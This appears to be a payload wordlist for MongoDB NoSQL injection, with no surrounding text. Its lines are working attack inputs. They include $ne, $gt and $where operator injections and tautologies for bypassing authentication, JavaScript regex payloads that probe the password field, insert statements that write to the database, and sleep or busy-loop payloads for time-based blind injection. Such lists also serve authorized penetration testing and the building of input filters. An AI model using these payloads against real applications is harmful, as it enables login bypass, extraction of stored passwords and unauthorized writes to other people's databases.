' } ], $comment:'successful MongoDB injection'
{$gt: ''}
[$ne]=1
{ $ne: 1 }
', $or: [ {}, { 'a':'a
', $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
1, $where: '1 == 1'
|| 1==1
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
';sleep(5000);
';sleep(5000);'
';sleep(5000);+'
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
true, $where: '1 == 1'
